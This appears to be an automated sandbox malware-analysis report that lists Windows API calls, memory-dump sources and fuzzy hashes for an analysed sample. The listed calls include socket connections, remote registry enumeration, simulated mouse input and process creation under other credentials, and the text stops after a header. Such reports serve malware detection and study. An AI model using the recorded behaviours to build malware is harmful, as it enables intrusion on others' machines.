                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00E96630
                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E9664A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID:
                                            • API String ID: 2178440468-0
                                            • Opcode ID: 0a127c7ae47ca8147688e89fb16cdafb0abafe94a85e0eb2c47d6ec7acf49619
                                            • Instruction ID: 42cfbf1229c210f76acca9058d7f16d66493de91a813799a03037777e7b4cc7f
                                            • Opcode Fuzzy Hash: 0a127c7ae47ca8147688e89fb16cdafb0abafe94a85e0eb2c47d6ec7acf49619
                                            • Instruction Fuzzy Hash: 0F310234604210AFDF208F1AEC84F553BE1FB4A358F1A11AAF501EB2B6CB61AC44DB81
                                            APIs
                                              • Part of subcall function 00E880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E864D9
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E864E8
                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E86521
                                            • connect.WSOCK32(00000000,?,00000010), ref: 00E8652A
                                            • WSAGetLastError.WSOCK32 ref: 00E86534
                                            • closesocket.WSOCK32(00000000), ref: 00E8655D
                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E86576
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                            • String ID:
                                            • API String ID: 910771015-0
                                            • Opcode ID: 274b7223b4ab0aa71d424d9d82dfed91363fbcaeebd1a25aa1d0c9670449066f
                                            • Instruction ID: b3e3e2d8d00ecd74b6b49545fa3f39d941ac98d544a4c8cfc5b0df3e34cc46f6
                                            • Opcode Fuzzy Hash: 274b7223b4ab0aa71d424d9d82dfed91363fbcaeebd1a25aa1d0c9670449066f
                                            • Instruction Fuzzy Hash: C9319071600218AFDB10AF64DC85BBE7BA9EB44714F04402AF90EF7291DB74AD48CBA1
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E6E0FA
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E6E120
                                            • SysAllocString.OLEAUT32(00000000), ref: 00E6E123
                                            • SysAllocString.OLEAUT32 ref: 00E6E144
                                            • SysFreeString.OLEAUT32 ref: 00E6E14D
                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00E6E167
                                            • SysAllocString.OLEAUT32(?), ref: 00E6E175
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                            • String ID:
                                            • API String ID: 3761583154-0
                                            • Opcode ID: 2a20803376dff2514a6e1e8a19bf6996f0d85a7c9743d902594db662e41cbfa9
                                            • Instruction ID: 3d08e48b286fffa90505cb513e84fbfda8415ce378b5004e2679c653327a33cc
                                            • Opcode Fuzzy Hash: 2a20803376dff2514a6e1e8a19bf6996f0d85a7c9743d902594db662e41cbfa9
                                            • Instruction Fuzzy Hash: BE219835645108AFDF109FA9DC88CAB77ECEB097A0B108136F915EB3A1DA70DC45DB64
                                            APIs
                                              • Part of subcall function 00E11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E11D73
                                              • Part of subcall function 00E11D35: GetStockObject.GDI32(00000011), ref: 00E11D87
                                              • Part of subcall function 00E11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E11D91
                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E978A1
                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E978AE
                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E978B9
                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E978C8
                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E978D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CreateObjectStockWindow
                                            • String ID: Msctls_Progress32
                                            • API String ID: 1025951953-3636473452
                                            • Opcode ID: 731a54fee84dcc3e8ed56cd7cdf8319294e3ba2773dad06c2c0d36712a9c36d2
                                            • Instruction ID: b1b4e474e60375a4909ad97b29bf2e31b42fd617a11b292f5bcafe1286e16660
                                            • Opcode Fuzzy Hash: 731a54fee84dcc3e8ed56cd7cdf8319294e3ba2773dad06c2c0d36712a9c36d2
                                            • Instruction Fuzzy Hash: 501190B2110219BFEF159F60CC85EEB7F6DEF08798F015115FA44A2090C7729C21DBA0
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E34292,?), ref: 00E341E3
                                            • GetProcAddress.KERNEL32(00000000), ref: 00E341EA
                                            • EncodePointer.KERNEL32(00000000), ref: 00E341F6
                                            • DecodePointer.KERNEL32(00000001,00E34292,?), ref: 00E34213
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                            • String ID: RoInitialize$combase.dll
                                            • API String ID: 3489934621-340411864
                                            • Opcode ID: 6fac065ceef3e6f3345e657251bf76770ecac11a71e9eed04c9bc9f36f5717a1
                                            • Instruction ID: 14a056511076c6ba523931228334e7ac65af011b34725f6cc02eae65798896ab
                                            • Opcode Fuzzy Hash: 6fac065ceef3e6f3345e657251bf76770ecac11a71e9eed04c9bc9f36f5717a1
                                            • Instruction Fuzzy Hash: 40E0EDF0592300AFDB106B76EC0DB043A94AB25706F506426F551F50F0DBB550998E00
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E341B8), ref: 00E342B8
                                            • GetProcAddress.KERNEL32(00000000), ref: 00E342BF
                                            • EncodePointer.KERNEL32(00000000), ref: 00E342CA
                                            • DecodePointer.KERNEL32(00E341B8), ref: 00E342E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                            • String ID: RoUninitialize$combase.dll
                                            • API String ID: 3489934621-2819208100
                                            • Opcode ID: dab2ec2b59f99b7809b37f2974bb6d8b3c8975e5fc8a8f312c9481bbf8a23cb9
                                            • Instruction ID: 3810ea45792b7b082fc18161cb3d1c081a4aaf2df80bbfb525123c95efea5016
                                            • Opcode Fuzzy Hash: dab2ec2b59f99b7809b37f2974bb6d8b3c8975e5fc8a8f312c9481bbf8a23cb9
                                            • Instruction Fuzzy Hash: 7BE092B8583311AFEA109B66FC0DB093BA4FB25B46F10503BF111F50F0CBB4A588CA14
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$__itow__swprintf
                                            • String ID:
                                            • API String ID: 3253778849-0
                                            • Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                            • Instruction ID: 0a6081c66ce0f54f0ab6fb4a8606efd47cc03ae878d328200e53c3e26ce26efc
                                            • Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                            • Instruction Fuzzy Hash: 0961F23050465A9BDF15EF20CC96EFE3BE4AF88308F04A559F95A7B192DB309D41CB51
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90548
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E90588
                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E905AB
                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E905D4
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E90617
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E90624
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                            • String ID:
                                            • API String ID: 4046560759-0
                                            • Opcode ID: ccb91d2f218a226c5a800118a65f074f53948ae276a03e6aeb30f9dfcdc02386
                                            • Instruction ID: ae08230827a7a9cb155773d9b73e536c39908345b31b5b2fad7a8760c7b89777
                                            • Opcode Fuzzy Hash: ccb91d2f218a226c5a800118a65f074f53948ae276a03e6aeb30f9dfcdc02386
                                            • Instruction Fuzzy Hash: AD515C31208200AFCB14EF54C885EAFBBE9FF88714F44595EF595A72A2DB31E944CB52
                                            APIs
                                            • GetMenu.USER32(?), ref: 00E95A82
                                            • GetMenuItemCount.USER32(00000000), ref: 00E95AB9
                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E95AE1
                                            • GetMenuItemID.USER32(?,?), ref: 00E95B50
                                            • GetSubMenu.USER32(?,?), ref: 00E95B5E
                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E95BAF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountMessagePostString
                                            • String ID:
                                            • API String ID: 650687236-0
                                            • Opcode ID: a5d3ebd4c2b5e308eb366fb0bc64e8b2d023ec0ef41a8d93c4ac537ddd830918
                                            • Instruction ID: 79f7d3126f79c9febe138368ef047915f669b92e5f68b85087dca98732eb214c
                                            • Opcode Fuzzy Hash: a5d3ebd4c2b5e308eb366fb0bc64e8b2d023ec0ef41a8d93c4ac537ddd830918
                                            • Instruction Fuzzy Hash: F2515B32A00615EFCF16AFA4C855AAEBBF5EF48310F10546AE916B7251DB70AE418B90
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00E6F3F7
                                            • VariantClear.OLEAUT32(00000013), ref: 00E6F469
                                            • VariantClear.OLEAUT32(00000000), ref: 00E6F4C4
                                            • _memmove.LIBCMT ref: 00E6F4EE
                                            • VariantClear.OLEAUT32(?), ref: 00E6F53B
                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E6F569
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                            • String ID:
                                            • API String ID: 1101466143-0
                                            • Opcode ID: 73d2fda9e709dc4a6122194294f3da18529ddc80212cf1af2ad66f6a84d5b3ac
                                            • Instruction ID: 1c0e2e0c7d75b0b1c393bf472fef9c49ddeee6fd6f2d41d118be0cdf438fdeb9
                                            • Opcode Fuzzy Hash: 73d2fda9e709dc4a6122194294f3da18529ddc80212cf1af2ad66f6a84d5b3ac
                                            • Instruction Fuzzy Hash: 97513CB5A00209DFCB14CF58E884AAAB7F8FF4C354B15856AE959EB311D730E951CFA0
                                            APIs
                                            • _memset.LIBCMT ref: 00E72747
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E72792
                                            • IsMenu.USER32(00000000), ref: 00E727B2
                                            • CreatePopupMenu.USER32 ref: 00E727E6
                                            • GetMenuItemCount.USER32(000000FF), ref: 00E72844
                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E72875
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                            • String ID:
                                            • API String ID: 3311875123-0
                                            • Opcode ID: a868d134e4b51eb5e9b471f61b918da2c2669cf1dd13f329f179dc6213298fee
                                            • Instruction ID: 1491267ef02de2299d92f5a0b5e7f0639ecfb9c26209d12173f8eca78b1613bd
                                            • Opcode Fuzzy Hash: a868d134e4b51eb5e9b471f61b918da2c2669cf1dd13f329f179dc6213298fee
                                            • Instruction Fuzzy Hash: 1151A270A00205DFEF28CF64D888BADBBF4AF44318F10915EE619BB291D7718944CB52
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E1179A
                                            • GetWindowRect.USER32(?,?), ref: 00E117FE
                                            • ScreenToClient.USER32(?,?), ref: 00E1181B
                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E1182C
                                            • EndPaint.USER32(?,?), ref: 00E11876
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                            • String ID:
                                            • API String ID: 1827037458-0
                                            • Opcode ID: 924221aabb767efe5b9afb4ce38992c7d3c24861bdf9cf85cfff4ad77a6b47dd
                                            • Instruction ID: 2cbee0efb0ac1a45b9bd5570cea7baf63b9676e530dc990f889b2783ff747d81
                                            • Opcode Fuzzy Hash: 924221aabb767efe5b9afb4ce38992c7d3c24861bdf9cf85cfff4ad77a6b47dd
                                            • Instruction Fuzzy Hash: 1741A3705043019FD710DF25DC84BB67BF8EB49724F14466AF6A4A61A1C7309889EB61
                                            APIs
                                            • ShowWindow.USER32(00ED67B0,00000000,01044E28,?,?,00ED67B0,?,00E9B862,?,?), ref: 00E9B9CC
                                            • EnableWindow.USER32(00000000,00000000), ref: 00E9B9F0
                                            • ShowWindow.USER32(00ED67B0,00000000,01044E28,?,?,00ED67B0,?,00E9B862,?,?), ref: 00E9BA50
                                            • ShowWindow.USER32(00000000,00000004,?,00E9B862,?,?), ref: 00E9BA62
                                            • EnableWindow.USER32(00000000,00000001), ref: 00E9BA86
                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E9BAA9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Show$Enable$MessageSend
                                            • String ID:
                                            • API String ID: 642888154-0
                                            • Opcode ID: e89172b3279e45980f71a9a0e1e6862cf24a4e0c887e14dc592c3544135d8f69
                                            • Instruction ID: 1d14e0e513a3c79e338b784872bf3272dd7970f9cc960ccf980e4c89c4de7cf2
                                            • Opcode Fuzzy Hash: e89172b3279e45980f71a9a0e1e6862cf24a4e0c887e14dc592c3544135d8f69
                                            • Instruction Fuzzy Hash: A1415030600241AFDF21CF59E689BD57BE0BB45318F1852BAEA58AF2A2C771EC45CB51
                                            APIs
                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00E85134,?,?,00000000,00000001), ref: 00E873BF
                                              • Part of subcall function 00E83C94: GetWindowRect.USER32(?,?), ref: 00E83CA7
                                            • GetDesktopWindow.USER32 ref: 00E873E9
                                            • GetWindowRect.USER32(00000000), ref: 00E873F0
                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E87422
                                              • Part of subcall function 00E754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E7555E
                                            • GetCursorPos.USER32(?), ref: 00E8744E
                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E874AC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                            • String ID:
                                            • API String ID: 4137160315-0
                                            • Opcode ID: 7cfea31ba7087cd138d35e070e76f8fe666695429380a845f55658a57bbd6d0e
                                            • Instruction ID: 25f843d69ed8a96c33629de606bfdd21734d9146ff0d587930c06053a6bf39e4
                                            • Opcode Fuzzy Hash: 7cfea31ba7087cd138d35e070e76f8fe666695429380a845f55658a57bbd6d0e
                                            • Instruction Fuzzy Hash: C331F432508306AFC720EF14D849E9BBBE9FF88304F10091AF89DE7191C670E948CB92
                                            APIs
                                              • Part of subcall function 00E685F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E68608
                                              • Part of subcall function 00E685F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E68612
                                              • Part of subcall function 00E685F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E68621
                                              • Part of subcall function 00E685F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E68628
                                              • Part of subcall function 00E685F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E6863E
                                            • GetLengthSid.ADVAPI32(?,00000000,00E68977), ref: 00E68DAC
                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E68DB8
                                            • HeapAlloc.KERNEL32(00000000), ref: 00E68DBF
                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E68DD8
                                            • GetProcessHeap.KERNEL32(00000000,00000000,00E68977), ref: 00E68DEC
                                            • HeapFree.KERNEL32(00000000), ref: 00E68DF3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                            • String ID:
                                            • API String ID: 3008561057-0
                                            • Opcode ID: f062a46358f273452c3883be380a3e65e199e6ba110783c22f806e1e823c2a90
                                            • Instruction ID: 5b9b79b8e9ad94ea1bdce2f54e907173c133ddaa2e2d6a7389657899c006a3cc
                                            • Opcode Fuzzy Hash: f062a46358f273452c3883be380a3e65e199e6ba110783c22f806e1e823c2a90
                                            • Instruction Fuzzy Hash: C511E131941604FFDB108F65ED08BAE77ADEF41399F10522AE845F3251CB319D04CB60
                                            APIs
                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E68B2A
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00E68B31
                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E68B40
                                            • CloseHandle.KERNEL32(00000004), ref: 00E68B4B
                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E68B7A
                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E68B8E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
